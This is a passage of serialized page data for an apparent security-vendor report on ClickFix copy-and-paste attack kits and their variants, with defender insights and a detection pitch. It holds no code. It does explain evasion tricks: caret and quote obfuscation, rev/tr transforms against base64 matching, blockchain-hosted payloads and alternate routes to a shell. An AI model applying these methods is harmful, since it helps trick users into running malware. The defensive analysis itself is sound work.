CAPTCHA malicious copy and paste attack tool delivered from compromised websites. It leverages the EtherHiding technique for hosting its lure content and malicious payloads on a public blockchain. NOCHAIN also introduced an interesting browser-based persistence mechanism by registering a service worker that continues to deliver the payload to repeat visitors.",[],{},{"nodeType":695,"data":4580,"content":4581},{},[4582],{"nodeType":699,"value":4583,"marks":4584,"data":4585},"Visiting a site that has been compromised with NOCHAIN presents a fake clone of Google Search's \"unusual traffic from your computer network\" page with a reCAPTCHA checkbox. Upon clicking the checkbox, the payload is put onto the victim's clipboard and instructions for executing it via the Windows run dialog are displayed.",[],{},{"nodeType":1041,"data":4587,"content":4591},{"target":4588},{"sys":4589},{"id":4590,"type":1046,"linkType":1047},"2DQzGhSAKZxQyyn4ICkyyp",[],{"nodeType":769,"data":4593,"content":4594},{},[4595],{"nodeType":699,"value":4596,"marks":4597,"data":4599},"TURNTIP",[4598],{"type":707},{},{"nodeType":695,"data":4601,"content":4602},{},[4603],{"nodeType":699,"value":4604,"marks":4605,"data":4606},"TURNTIP is a malicious copy and paste attack tool that is based on injecting a fake Cloudflare Turnstile interstitial into compromised sites. Push has observed active development of this tool throughout 2025 and 2026 with several distinct evolutions to the loader in particular.",[],{},{"nodeType":695,"data":4608,"content":4609},{},[4610],{"nodeType":699,"value":4611,"marks":4612,"data":4613},"Push named this threat after the distinctive help tooltip that's included in the execution prompt instructions to ensure that victims can find the Windows meta key to open the run dialog.",[],{},{"nodeType":1041,"data":4615,"content":4619},{"target":4616},{"sys":4617},{"id":4618,"type":1046,"linkType":1047},"28g3nfKTW7us3YqvZ3chGC",[],{"nodeType":721,"data":4621,"content":4622},{},[],{"nodeType":725,"data":4624,"content":4625},{},[4626],{"nodeType":699,"value":4627,"marks":4628,"data":4630},"How Push can help",[4629],{"type":707},{},{"nodeType":695,"data":4632,"content":4633},{},[4634],{"nodeType":699,"value":4635,"marks":4636,"data":4637},"Push detects ClickFix attacks inside the browser before the payload reaches the endpoint. ",[],{},{"nodeType":1589,"data":4639,"content":4640},{},[4641,4651],{"nodeType":1593,"data":4642,"content":4643},{},[4644],{"nodeType":695,"data":4645,"content":4646},{},[4647],{"nodeType":699,"value":4648,"marks":4649,"data":4650},"Real-time page analysis identifies ClickFix kits on page load from their page structure and script behavior, independent of the attacker's infrastructure, so techniques like EtherHiding and domain rotation don't affect detection. ",[],{},{"nodeType":1593,"data":4652,"content":4653},{},[4654],{"nodeType":695,"data":4655,"content":4656},{},[4657],{"nodeType":699,"value":4658,"marks":4659,"data":4660},"Malicious copy and paste detection fires on the clipboard event itself, catching the payload regardless of which LOLBin it invokes or how it's obfuscated — and covering every xFix derivative. ",[],{},{"nodeType":695,"data":4662,"content":4663},{},[4664],{"nodeType":699,"value":4665,"marks":4666,"data":4667},"Because Push operates at the browser layer, it intercepts ClickFix regardless of delivery mechanism, tackling attacks that arrive via search engines and compromised sites rather than email. This adds a powerful layer of protection in the browser that works alongside endpoint-layer controls, and is a flexible way of extending protection to machines that lack endpoint security controls such as BYOD devices, contractor machines, Macs, and developer machines.",[],{},{"nodeType":721,"data":4669,"content":4670},{},[],{"nodeType":725,"data":4672,"content":4673},{},[4674],{"nodeType":699,"value":4675,"marks":4676,"data":4678},"Appendix: Catalog of sub-techniques",[4677],{"type":707},{},{"nodeType":695,"data":4680,"content":4681},{},[4682],{"nodeType":699,"value":4683,"marks":4684,"data":4685},"Numerous ClickFix derivatives have emerged (many of which aren’t really fundamentally different enough to be given a whole new name) with varying lures, payloads, and deception tactics. For the majority, the core mechanics remain the same. ",[],{},{"nodeType":4687,"data":4688,"content":4689},"table",{},[4690,4717,4740,4763,4786,4808,4831,4854,4877,4900,4923,4946],{"nodeType":4691,"data":4692,"content":4693},"table-row",{},[4694,4706],{"nodeType":4695,"data":4696,"content":4697},"table-cell",{},[4698],{"nodeType":695,"data":4699,"content":4700},{},[4701],{"nodeType":699,"value":4702,"marks":4703,"data":4705},"Variant",[4704],{"type":707},{},{"nodeType":4695,"data":4707,"content":4708},{},[4709],{"nodeType":695,"data":4710,"content":4711},{},[4712],{"nodeType":699,"value":4713,"marks":4714,"data":4716},"Mechanic",[4715],{"type":707},{},{"nodeType":4691,"data":4718,"content":4719},{},[4720,4730],{"nodeType":4695,"data":4721,"content":4722},{},[4723],{"nodeType":695,"data":4724,"content":4725},{},[4726],{"nodeType":699,"value":4727,"marks":4728,"data":4729},"ClickFix",[],{},{"nodeType":4695,"data":4731,"content":4732},{},[4733],{"nodeType":695,"data":4734,"content":4735},{},[4736],{"nodeType":699,"value":4737,"marks":4738,"data":4739},"The original: fake error or CAPTCHA prompt tricks the user into opening Run (Win+R) or Terminal and pasting a clipboard-injected command. Remains the dominant in-the-wild technique.",[],{},{"nodeType":4691,"data":4741,"content":4742},{},[4743,4753],{"nodeType":4695,"data":4744,"content":4745},{},[4746],{"nodeType":695,"data":4747,"content":4748},{},[4749],{"nodeType":699,"value":4750,"marks":4751,"data":4752},"TerminalFix",[],{},{"nodeType":4695,"data":4754,"content":4755},{},[4756],{"nodeType":695,"data":4757,"content":4758},{},[4759],{"nodeType":699,"value":4760,"marks":4761,"data":4762},"Fake Cloudflare CAPTCHA on compromised sites instructs the user to open Windows Terminal (Win+X → I) instead of the Run dialog, deploying reverse tunnel backdoors for persistent network access. ",[],{},{"nodeType":4691,"data":4764,"content":4765},{},[4766,4776],{"nodeType":4695,"data":4767,"content":4768},{},[4769],{"nodeType":695,"data":4770,"content":4771},{},[4772],{"nodeType":699,"value":4773,"marks":4774,"data":4775},"CrashFix",[],{},{"nodeType":4695,"data":4777,"content":4778},{},[4779],{"nodeType":695,"data":4780,"content":4781},{},[4782],{"nodeType":699,"value":4783,"marks":4784,"data":4785},"Deliberately crashes or freezes the browser, then presents \"fix\" instructions that involve pasting a malicious command. Relies on urgency and the user's desire to recover their session. ",[],{},{"nodeType":4691,"data":4787,"content":4788},{},[4789,4798],{"nodeType":4695,"data":4790,"content":4791},{},[4792],{"nodeType":695,"data":4793,"content":4794},{},[4795],{"nodeType":699,"value":1378,"marks":4796,"data":4797},[],{},{"nodeType":4695,"data":4799,"content":4800},{},[4801],{"nodeType":695,"data":4802,"content":4803},{},[4804],{"nodeType":699,"value":4805,"marks":4806,"data":4807},"Abuses OAuth consent flows via ClickFix-style interaction — the user is walked through granting permissions to a malicious application under the guise of verification or troubleshooting. ",[],{},{"nodeType":4691,"data":4809,"content":4810},{},[4811,4821],{"nodeType":4695,"data":4812,"content":4813},{},[4814],{"nodeType":695,"data":4815,"content":4816},{},[4817],{"nodeType":699,"value":4818,"marks":4819,"data":4820},"ClickExfil",[],{},{"nodeType":4695,"data":4822,"content":4823},{},[4824],{"nodeType":695,"data":4825,"content":4826},{},[4827],{"nodeType":699,"value":4828,"marks":4829,"data":4830},"Uses browser fingerprinting for OS-specific instructions and targets high-value local files including OAuth tokens. Bypasses EDR controls not designed to detect user-initiated outbound transfers.",[],{},{"nodeType":4691,"data":4832,"content":4833},{},[4834,4844],{"nodeType":4695,"data":4835,"content":4836},{},[4837],{"nodeType":695,"data":4838,"content":4839},{},[4840],{"nodeType":699,"value":4841,"marks":4842,"data":4843},"InstallFix",[],{},{"nodeType":4695,"data":4845,"content":4846},{},[4847],{"nodeType":695,"data":4848,"content":4849},{},[4850],{"nodeType":699,"value":4851,"marks":4852,"data":4853},"Fake install guide — \"Install on Windows — Quick install via PowerShell\" — for developer tools and AI products. Distributed via malvertising, cloned docs, and shared LLM conversation URLs (the LLMshare delivery route). Push has detected this against Claude Code, NotebookLM, ChatGPT, and Codex branding.",[],{},{"nodeType":4691,"data":4855,"content":4856},{},[4857,4867],{"nodeType":4695,"data":4858,"content":4859},{},[4860],{"nodeType":695,"data":4861,"content":4862},{},[4863],{"nodeType":699,"value":4864,"marks":4865,"data":4866},"ClickLock (macOS)",[],{},{"nodeType":4695,"data":4868,"content":4869},{},[4870],{"nodeType":695,"data":4871,"content":4872},{},[4873],{"nodeType":699,"value":4874,"marks":4875,"data":4876},"Repeatedly force-kills applications until the user surrenders their login password to make it stop. Targets macOS specifically. ",[],{},{"nodeType":4691,"data":4878,"content":4879},{},[4880,4890],{"nodeType":4695,"data":4881,"content":4882},{},[4883],{"nodeType":695,"data":4884,"content":4885},{},[4886],{"nodeType":699,"value":4887,"marks":4888,"data":4889},"DragFix",[],{},{"nodeType":4695,"data":4891,"content":4892},{},[4893],{"nodeType":695,"data":4894,"content":4895},{},[4896],{"nodeType":699,"value":4897,"marks":4898,"data":4899},"Manipulates drag-and-drop interactions — the user drags what appears to be a normal UI element but is actually dropping a malicious file or payload into an execution context.",[],{},{"nodeType":4691,"data":4901,"content":4902},{},[4903,4913],{"nodeType":4695,"data":4904,"content":4905},{},[4906],{"nodeType":695,"data":4907,"content":4908},{},[4909],{"nodeType":699,"value":4910,"marks":4911,"data":4912},"FileFix",[],{},{"nodeType":4695,"data":4914,"content":4915},{},[4916],{"nodeType":695,"data":4917,"content":4918},{},[4919],{"nodeType":699,"value":4920,"marks":4921,"data":4922},"Abuses the File Explorer address bar — the user is instructed to paste a path or command into the address bar rather than the Run dialog, achieving execution through a less-monitored surface.",[],{},{"nodeType":4691,"data":4924,"content":4925},{},[4926,4936],{"nodeType":4695,"data":4927,"content":4928},{},[4929],{"nodeType":695,"data":4930,"content":4931},{},[4932],{"nodeType":699,"value":4933,"marks":4934,"data":4935},"DownloadFix",[],{},{"nodeType":4695,"data":4937,"content":4938},{},[4939],{"nodeType":695,"data":4940,"content":4941},{},[4942],{"nodeType":699,"value":4943,"marks":4944,"data":4945},"Tricks the user into downloading and executing a file directly (.exe\u002F.dmg) rather than using clipboard-paste-execute — ClickFix lure mechanics applied to a traditional download vector.",[],{},{"nodeType":4691,"data":4947,"content":4948},{},[4949,4959],{"nodeType":4695,"data":4950,"content":4951},{},[4952],{"nodeType":695,"data":4953,"content":4954},{},[4955],{"nodeType":699,"value":4956,"marks":4957,"data":4958},"Fake Update",[],{},{"nodeType":4695,"data":4960,"content":4961},{},[4962],{"nodeType":695,"data":4963,"content":4964},{},[4965],{"nodeType":699,"value":4966,"marks":4967,"data":4968},"The original SocGholish\u002FCLEARFAKE mechanic: a compromised site displays a fake browser or software update prompt. The user clicks through and either downloads a malicious installer or is redirected into a ClickFix clipboard-paste flow. ",[],{},{"nodeType":695,"data":4970,"content":4971},{},[4972],{"nodeType":699,"value":21,"marks":4973,"data":4974},[],{},{"entries":4976},{"hyperlink":4977,"inline":4978,"block":4979},[],[],[4980,4988,5003,5017,5031,5050,5077,5084,5092,5099,5106,5112,5130,5148,5154,5161,5167],{"sys":4981,"__typename":4982,"title":4983,"caption":4983,"layoutMode":60,"file":4984},{"id":3783},"Image","Top trending ClickFix kits: ERRTRAFFIC, TURNTIP, NOCHAIN, and CLEARFAKE",{"url":4985,"width":4986,"height":4987},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2Sih5PQLbqOVdULXAtCxhj\u002F45e16c6a1d3616d132c0775ff58a2252\u002Fimage12.png",1999,997,{"sys":4989,"__typename":4990,"content":4991,"name":5002,"title":60},{"id":3966},"InsightTextBlockComponent",{"json":4992},{"data":4993,"content":4994,"nodeType":691},{},[4995],{"data":4996,"content":4997,"nodeType":695},{},[4998],{"data":4999,"marks":5000,"value":5001,"nodeType":699},{},[],"The standard EDR guidance for detecting LOLBin abuse is: baseline normal usage in your environment over 30 days, then alert on anomalies — unusual parent processes, command-line arguments, network connections from trusted binaries, and so on. The problem is that \"unusual\" varies enormously across environments. IT automation, software deployment, MDM tools, and admin scripts all generate legitimate LOLBin activity that looks suspicious out of context. The result is a high false-positive rate that requires significant per-environment tuning. And the set of binaries to monitor keeps growing.","ClickFix 2026 IB1",{"sys":5004,"__typename":4990,"content":5005,"name":5016,"title":60},{"id":3997},{"json":5006},{"nodeType":691,"data":5007,"content":5008},{},[5009],{"nodeType":695,"data":5010,"content":5011},{},[5012],{"nodeType":699,"value":5013,"marks":5014,"data":5015},"Alongside base64, we also commonly see openssls base64 as a slight variation on this. Some include a legitimate command prefix, like the example above, and others incorporate small transforms using `rev`, `tr`, etc to defeat string matching against base64 payloads. ",[],{},"ClickFix 2026 IB2",{"sys":5018,"__typename":4990,"content":5019,"name":5030,"title":60},{"id":4078},{"json":5020},{"nodeType":691,"data":5021,"content":5022},{},[5023],{"nodeType":695,"data":5024,"content":5025},{},[5026],{"nodeType":699,"value":5027,"marks":5028,"data":5029},"Incorporating carets and nested quotes has become increasingly more common to defeat binary string matching. Novel launchers continue to emerge, pclua being one of the recent additions.",[],{},"ClickFix 2026 IB3",{"sys":5032,"__typename":4990,"content":5033,"name":5049,"title":60},{"id":4168},{"json":5034},{"nodeType":691,"data":5035,"content":5036},{},[5037],{"nodeType":695,"data":5038,"content":5039},{},[5040,5045],{"nodeType":699,"value":5041,"marks":5042,"data":5044},"Why this matters for defenders:",[5043],{"type":707},{},{"nodeType":699,"value":5046,"marks":5047,"data":5048}," EtherHiding is designed to get around solutions reliant on blocking attacker-controlled infrastructure — URL blocklists, domain reputation services, DNS filtering, and takedown-based disruption. The traditional kill chain has a domain or IP somewhere in the delivery path that defenders can block or request a takedown against; EtherHiding eliminates that by storing kit configuration in a smart contract that no hosting provider can be asked to remove. The payload URL can still be blocked, but the operator rotates it with a single transaction and every compromised site picks up the new one automatically. ",[],{},"ClickFix 2026 IB4",{"sys":5051,"__typename":4990,"content":5052,"name":5076,"title":60},{"id":4189},{"json":5053},{"nodeType":691,"data":5054,"content":5055},{},[5056],{"nodeType":695,"data":5057,"content":5058},{},[5059,5063,5067,5072],{"nodeType":699,"value":5041,"marks":5060,"data":5062},[5061],{"type":707},{},{"nodeType":699,"value":5064,"marks":5065,"data":5066}," The standard ClickFix mitigation advice starts with blocking the Run dialog: \"Remove Run menu from Start Menu\" or \"Restrict Run dialog access\" (User Configuration → Administrative Templates → System) disables Win+R and the dialog itself. But for Win+X, there's no built-in GPO to disable the Power User menu or the keyboard shortcut. Even blocking both shortcuts doesn't block the applications behind them. The user — or the attacker's instructions — can reach the same shells through different routes: Start menu search, File Explorer address bar (type powershell and hit enter), Task Manager's \"Run new task,\" right-click context menu in any folder (Shift + right-click → \"Open PowerShell here\"), cmd → start powershell, or a desktop shortcut. ",[],{},{"nodeType":699,"value":5068,"marks":5069,"data":5071},"There are many paths to a shell on a modern OS, and the attacker only needs to pick one the defender hasn't closed. ",[5070],{"type":707},{},{"nodeType":699,"value":5073,"marks":5074,"data":5075},"\n",[],{},"ClickFix 2026 IB5",{"sys":5078,"__typename":4982,"title":5079,"caption":5079,"layoutMode":60,"file":5080},{"id":4217},"Malvertising into a faked Claude Code install guide with malicious install commands (a clone of the legitimate page)",{"url":5081,"width":5082,"height":5083},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2lyQA1II4e5idsJMXi3dWP\u002F0af02e5e2f9d7d560411aceb980ffc9a\u002FGroup_744.png",3943,1107,{"sys":5085,"__typename":4982,"title":5086,"caption":5087,"layoutMode":60,"file":5088},{"id":4230},"A shared Claude.ai conversation containing malicious installation instructions.","A shared claude.ai conversation containing malicious installation instructions",{"url":5089,"width":5090,"height":5091},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2YLf3kEK2y2XjdyM1Q9uRT\u002F6b5774de9708ff8544889305a094d991\u002Fimage6.png",1920,945,{"sys":5093,"__typename":4982,"title":5094,"caption":5095,"layoutMode":60,"file":5096},{"id":4236},"A shared ChatGPT artefact styled to look like an error page, linking to a fake download page","A shared ChatGPT artefact styled to look like an error page, linking to a fake download page.",{"url":5097,"width":4986,"height":5098},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F5grmZOTXQcb1uDHhMw8e20\u002F239aece66c5f29745dd2a77fd288de49\u002Fimage1.png",875,{"sys":5100,"__typename":4982,"title":5101,"caption":5102,"layoutMode":60,"file":5103},{"id":4249},"Fake Windows Update ClickFix lure accessed from a fake ChatGPT page","Fake Windows Update ClickFix lure accessed from a fake ChatGPT page.",{"url":5104,"width":4986,"height":5105},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F5t5VY2QhBgIkkVW8pORho8\u002Ff8883781178e3f9b7de99a69386a2c49\u002Fimage7.png",570,{"sys":5107,"__typename":5108,"title":5109,"arcadeDemoUrl":5110,"playText":5111},{"id":4255},"ArcadeDemo","Fake Windows Update ClickFix Demo","https:\u002F\u002Fdemo.arcade.software\u002F3IgfcjkgYZjaltyESSO4?embed","2 mins",{"sys":5113,"__typename":4990,"content":5114,"name":5129,"title":60},{"id":4313},{"json":5115},{"data":5116,"content":5117,"nodeType":691},{},[5118],{"data":5119,"content":5120,"nodeType":695},{},[5121,5125],{"data":5122,"marks":5123,"value":5041,"nodeType":699},{},[5124],{"type":707},{"data":5126,"marks":5127,"value":5128,"nodeType":699},{},[]," These changes make it increasingly difficult for network-layer tools and automated page analysis tools to find and analyse malicious pages for malicious content, with homoglyph\u002Ffragmentation techniques defeating text-matching classifiers, and the anti-analysis measures defeating automated crawlers.","ClickFix 2026 IB6",{"sys":5131,"__typename":4990,"content":5132,"name":5147,"title":60},{"id":4466},{"json":5133},{"data":5134,"content":5135,"nodeType":691},{},[5136],{"data":5137,"content":5138,"nodeType":695},{},[5139,5143],{"data":5140,"marks":5141,"value":5041,"nodeType":699},{},[5142],{"type":707},{"data":5144,"marks":5145,"value":5146,"nodeType":699},{},[]," Endpoint detection and blocking remains a cat-and-mouse game where attackers are continuously searching for new ways to bypass or disable endpoint security tools and detection strategies. And ClickFix is arguably becoming even more dangerous as the range of actors and motives behind ClickFix continues to widen — from commodity infostealers to ransomware affiliates and state-sponsored operations.","ClickFix 2026 IB7",{"sys":5149,"__typename":4982,"title":5150,"caption":60,"layoutMode":60,"file":5151},{"id":4510},"ErrTraffic example",{"url":5152,"width":4986,"height":5153},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F5HBTdwpNReJArmNDXPl7vU\u002Fec1c72ceabe4402cee16543dbefd52ec\u002Fimage5.png",991,{"sys":5155,"__typename":4982,"title":5156,"caption":60,"layoutMode":60,"file":5157},{"id":4562},"CLEARFAKE examples with different payloads.",{"url":5158,"width":5159,"height":5160},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F6PE7UDEkuk5kEcdONZjxnm\u002Fd5cf878aa4271218983e24c61ae21117\u002FGroup_745.png",2582,1136,{"sys":5162,"__typename":4982,"title":5163,"caption":60,"layoutMode":60,"file":5164},{"id":4590},"NOCHAIN example",{"url":5165,"width":4986,"height":5166},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F6OAUICNN0ODZwC9bQzqQZh\u002Fc0abeb25b156cb5340379f66d3c8b6c4\u002Fimage6.png",548,{"sys":5168,"__typename":4982,"title":5169,"caption":60,"layoutMode":60,"file":5170},{"id":4618},"TURNTIP example",{"url":5171,"width":4986,"height":5172},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F7KDu0IsvfvhgtNtPHhLQ8F\u002Fd426b000471763514668bd13b010a35f\u002Fimage8.png",565,{"items":5174},[],{},"The numbers behind ClickFix attacks in H2 2026","threat-research","2026-09-23T00:00:00.000Z",{"items":5180},[5181,5914,6974],{"__typename":952,"sys":5182,"content":5183,"title":1824,"synopsis":1825,"hashTags":60,"publishedDate":1826,"slug":1827,"tagsCollection":5904,"authorsCollection":5910},{"id":954},{"json":5184},{"nodeType":691,"data":5185,"content":5186},{},[5187,5200,5206,5209,5216,5222,5228,5253,5258,5264,5270,5276,5279,5286,5292,5295,5302,5308,5313,5319,5324,5340,5346,5352,5358,5363,5366,5373,5379,5384,5408,5414,5427,5442,5448,5453,5456,5463,5478,5484,5503,5529,5557,5563,5568,5571,5578,5584,5589,5604,5610,5632,5656,5661,5664,5671,5677,5682,5697,5703,5745,5776,5782,5787,5790,5797,5803,5809,5831,5846,5851,5854,5861,5876,5882,5888],{"nodeType":695,"data":5188,"content":5189},{},[5190,5193,5197],{"nodeType":699,"value":963,"marks":5191,"data":5192},[],{},{"nodeType":699,"value":967,"marks":5194,"data":5196},[5195],{"type":970},{},{"nodeType":699,"value":973,"marks":5198,"data":5199},[],{},{"nodeType":695,"data":5201,"content":5202},{},[5203],{"nodeType":699,"value":980,"marks":5204,"data":5205},[],{},{"nodeType":721,"data":5207,"content":5208},{},[],{"nodeType":725,"data":5210,"content":5211},{},[5212],{"nodeType":699,"value":990,"marks":5213,"data":5215},[5214],{"type":707},{},{"nodeType":695,"data":5217,"content":5218},{},[5219],{"nodeType":699,"value":998,"marks":5220,"data":5221},[],{},{"nodeType":695,"data":5223,"content":5224},{},[5225],{"nodeType":699,"value":1005,"marks":5226,"data":5227},[],{},{"nodeType":695,"data":5229,"content":5230},{},[5231,5234,5241,5244,5250],{"nodeType":699,"value":1012,"marks":5232,"data":5233},[],{},{"nodeType":791,"data":5235,"content":5236},{"uri":1017},[5237],{"nodeType":699,"value":1020,"marks":5238,"data":5240},[5239],{"type":799},{},{"nodeType":699,"value":1025,"marks":5242,"data":5243},[],{},{"nodeType":791,"data":5245,"content":5246},{"uri":1030},[5247],{"nodeType":699,"value":1033,"marks":5248,"data":5249},[],{},{"nodeType":699,"value":1037,"marks":5251,"data":5252},[],{},{"nodeType":1041,"data":5254,"content":5257},{"target":5255},{"sys":5256},{"id":1045,"type":1046,"linkType":1047},[],{"nodeType":695,"data":5259,"content":5260},{},[5261],{"nodeType":699,"value":1053,"marks":5262,"data":5263},[],{},{"nodeType":695,"data":5265,"content":5266},{},[5267],{"nodeType":699,"value":1060,"marks":5268,"data":5269},[],{},{"nodeType":695,"data":5271,"content":5272},{},[5273],{"nodeType":699,"value":1067,"marks":5274,"data":5275},[],{},{"nodeType":721,"data":5277,"content":5278},{},[],{"nodeType":725,"data":5280,"content":5281},{},[5282],{"nodeType":699,"value":1077,"marks":5283,"data":5285},[5284],{"type":707},{},{"nodeType":695,"data":5287,"content":5288},{},[5289],{"nodeType":699,"value":1085,"marks":5290,"data":5291},[],{},{"nodeType":721,"data":5293,"content":5294},{},[],{"nodeType":769,"data":5296,"content":5297},{},[5298],{"nodeType":699,"value":1095,"marks":5299,"data":5301},[5300],{"type":707},{},{"nodeType":695,"data":5303,"content":5304},{},[5305],{"nodeType":699,"value":1103,"marks":5306,"data":5307},[],{},{"nodeType":1041,"data":5309,"content":5312},{"target":5310},{"sys":5311},{"id":1110,"type":1046,"linkType":1047},[],{"nodeType":695,"data":5314,"content":5315},{},[5316],{"nodeType":699,"value":1116,"marks":5317,"data":5318},[],{},{"nodeType":1041,"data":5320,"content":5323},{"target":5321},{"sys":5322},{"id":1123,"type":1046,"linkType":1047},[],{"nodeType":695,"data":5325,"content":5326},{},[5327,5330,5337],{"nodeType":699,"value":1129,"marks":5328,"data":5329},[],{},{"nodeType":791,"data":5331,"content":5332},{"uri":1134},[5333],{"nodeType":699,"value":1137,"marks":5334,"data":5336},[5335],{"type":799},{},{"nodeType":699,"value":1142,"marks":5338,"data":5339},[],{},{"nodeType":695,"data":5341,"content":5342},{},[5343],{"nodeType":699,"value":1149,"marks":5344,"data":5345},[],{},{"nodeType":695,"data":5347,"content":5348},{},[5349],{"nodeType":699,"value":1156,"marks":5350,"data":5351},[],{},{"nodeType":695,"data":5353,"content":5354},{},[5355],{"nodeType":699,"value":1163,"marks":5356,"data":5357},[],{},{"nodeType":1041,"data":5359,"content":5362},{"target":5360},{"sys":5361},{"id":1170,"type":1046,"linkType":1047},[],{"nodeType":721,"data":5364,"content":5365},{},[],{"nodeType":769,"data":5367,"content":5368},{},[5369],{"nodeType":699,"value":1179,"marks":5370,"data":5372},[5371],{"type":707},{},{"nodeType":695,"data":5374,"content":5375},{},[5376],{"nodeType":699,"value":1187,"marks":5377,"data":5378},[],{},{"nodeType":1041,"data":5380,"content":5383},{"target":5381},{"sys":5382},{"id":1194,"type":1046,"linkType":1047},[],{"nodeType":695,"data":5385,"content":5386},{},[5387,5390,5396,5399,5405],{"nodeType":699,"value":1200,"marks":5388,"data":5389},[],{},{"nodeType":791,"data":5391,"content":5392},{"uri":1205},[5393],{"nodeType":699,"value":1208,"marks":5394,"data":5395},[],{},{"nodeType":699,"value":1212,"marks":5397,"data":5398},[],{},{"nodeType":791,"data":5400,"content":5401},{"uri":1217},[5402],{"nodeType":699,"value":1220,"marks":5403,"data":5404},[],{},{"nodeType":699,"value":1224,"marks":5406,"data":5407},[],{},{"nodeType":695,"data":5409,"content":5410},{},[5411],{"nodeType":699,"value":1231,"marks":5412,"data":5413},[],{},{"nodeType":695,"data":5415,"content":5416},{},[5417,5420,5424],{"nodeType":699,"value":1238,"marks":5418,"data":5419},[],{},{"nodeType":699,"value":1242,"marks":5421,"data":5423},[5422],{"type":707},{},{"nodeType":699,"value":1247,"marks":5425,"data":5426},[],{},{"nodeType":695,"data":5428,"content":5429},{},[5430,5433,5439],{"nodeType":699,"value":1254,"marks":5431,"data":5432},[],{},{"nodeType":791,"data":5434,"content":5435},{"uri":1259},[5436],{"nodeType":699,"value":1262,"marks":5437,"data":5438},[],{},{"nodeType":699,"value":1266,"marks":5440,"data":5441},[],{},{"nodeType":695,"data":5443,"content":5444},{},[5445],{"nodeType":699,"value":1273,"marks":5446,"data":5447},[],{},{"nodeType":1041,"data":5449,"content":5452},{"target":5450},{"sys":5451},{"id":1280,"type":1046,"linkType":1047},[],{"nodeType":721,"data":5454,"content":5455},{},[],{"nodeType":769,"data":5457,"content":5458},{},[5459],{"nodeType":699,"value":1289,"marks":5460,"data":5462},[5461],{"type":707},{},{"nodeType":695,"data":5464,"content":5465},{},[5466,5469,5475],{"nodeType":699,"value":1297,"marks":5467,"data":5468},[],{},{"nodeType":791,"data":5470,"content":5471},{"uri":1302},[5472],{"nodeType":699,"value":1305,"marks":5473,"data":5474},[],{},{"nodeType":699,"value":1309,"marks":5476,"data":5477},[],{},{"nodeType":695,"data":5479,"content":5480},{},[5481],{"nodeType":699,"value":1316,"marks":5482,"data":5483},[],{},{"nodeType":695,"data":5485,"content":5486},{},[5487,5491,5494,5500],{"nodeType":699,"value":265,"marks":5488,"data":5490},[5489],{"type":707},{},{"nodeType":699,"value":1327,"marks":5492,"data":5493},[],{},{"nodeType":791,"data":5495,"content":5496},{"uri":1332},[5497],{"nodeType":699,"value":1335,"marks":5498,"data":5499},[],{},{"nodeType":699,"value":1339,"marks":5501,"data":5502},[],{},{"nodeType":695,"data":5504,"content":5505},{},[5506,5510,5513,5519,5522,5526],{"nodeType":699,"value":260,"marks":5507,"data":5509},[5508],{"type":707},{},{"nodeType":699,"value":1350,"marks":5511,"data":5512},[],{},{"nodeType":791,"data":5514,"content":5515},{"uri":1355},[5516],{"nodeType":699,"value":1358,"marks":5517,"data":5518},[],{},{"nodeType":699,"value":1362,"marks":5520,"data":5521},[],{},{"nodeType":699,"value":1366,"marks":5523,"data":5525},[5524],{"type":707},{},{"nodeType":699,"value":1371,"marks":5527,"data":5528},[],{},{"nodeType":695,"data":5530,"content":5531},{},[5532,5536,5539,5545,5548,5554],{"nodeType":699,"value":1378,"marks":5533,"data":5535},[5534],{"type":707},{},{"nodeType":699,"value":1383,"marks":5537,"data":5538},[],{},{"nodeType":791,"data":5540,"content":5541},{"uri":1388},[5542],{"nodeType":699,"value":1391,"marks":5543,"data":5544},[],{},{"nodeType":699,"value":1395,"marks":5546,"data":5547},[],{},{"nodeType":791,"data":5549,"content":5550},{"uri":1400},[5551],{"nodeType":699,"value":1403,"marks":5552,"data":5553},[],{},{"nodeType":699,"value":1407,"marks":5555,"data":5556},[],{},{"nodeType":695,"data":5558,"content":5559},{},[5560],{"nodeType":699,"value":1414,"marks":5561,"data":5562},[],{},{"nodeType":1041,"data":5564,"content":5567},{"target":5565},{"sys":5566},{"id":1421,"type":1046,"linkType":1047},[],{"nodeType":721,"data":5569,"content":5570},{},[],{"nodeType":769,"data":5572,"content":5573},{},[5574],{"nodeType":699,"value":1430,"marks":5575,"data":5577},[5576],{"type":707},{},{"nodeType":695,"data":5579,"content":5580},{},[5581],{"nodeType":699,"value":1438,"marks":5582,"data":5583},[],{},{"nodeType":1041,"data":5585,"content":5588},{"target":5586},{"sys":5587},{"id":1445,"type":1046,"linkType":1047},[],{"nodeType":695,"data":5590,"content":5591},{},[5592,5595,5601],{"nodeType":699,"value":1451,"marks":5593,"data":5594},[],{},{"nodeType":791,"data":5596,"content":5597},{"uri":1456},[5598],{"nodeType":699,"value":1459,"marks":5599,"data":5600},[],{},{"nodeType":699,"value":1463,"marks":5602,"data":5603},[],{},{"nodeType":695,"data":5605,"content":5606},{},[5607],{"nodeType":699,"value":1470,"marks":5608,"data":5609},[],{},{"nodeType":695,"data":5611,"content":5612},{},[5613,5616,5620,5623,5629],{"nodeType":699,"value":1477,"marks":5614,"data":5615},[],{},{"nodeType":699,"value":1481,"marks":5617,"data":5619},[5618],{"type":707},{},{"nodeType":699,"value":1486,"marks":5621,"data":5622},[],{},{"nodeType":791,"data":5624,"content":5625},{"uri":1491},[5626],{"nodeType":699,"value":1494,"marks":5627,"data":5628},[],{},{"nodeType":699,"value":1498,"marks":5630,"data":5631},[],{},{"nodeType":695,"data":5633,"content":5634},{},[5635,5638,5644,5647,5653],{"nodeType":699,"value":1505,"marks":5636,"data":5637},[],{},{"nodeType":791,"data":5639,"content":5640},{"uri":1510},[5641],{"nodeType":699,"value":1513,"marks":5642,"data":5643},[],{},{"nodeType":699,"value":1517,"marks":5645,"data":5646},[],{},{"nodeType":791,"data":5648,"content":5649},{"uri":1522},[5650],{"nodeType":699,"value":1525,"marks":5651,"data":5652},[],{},{"nodeType":699,"value":1529,"m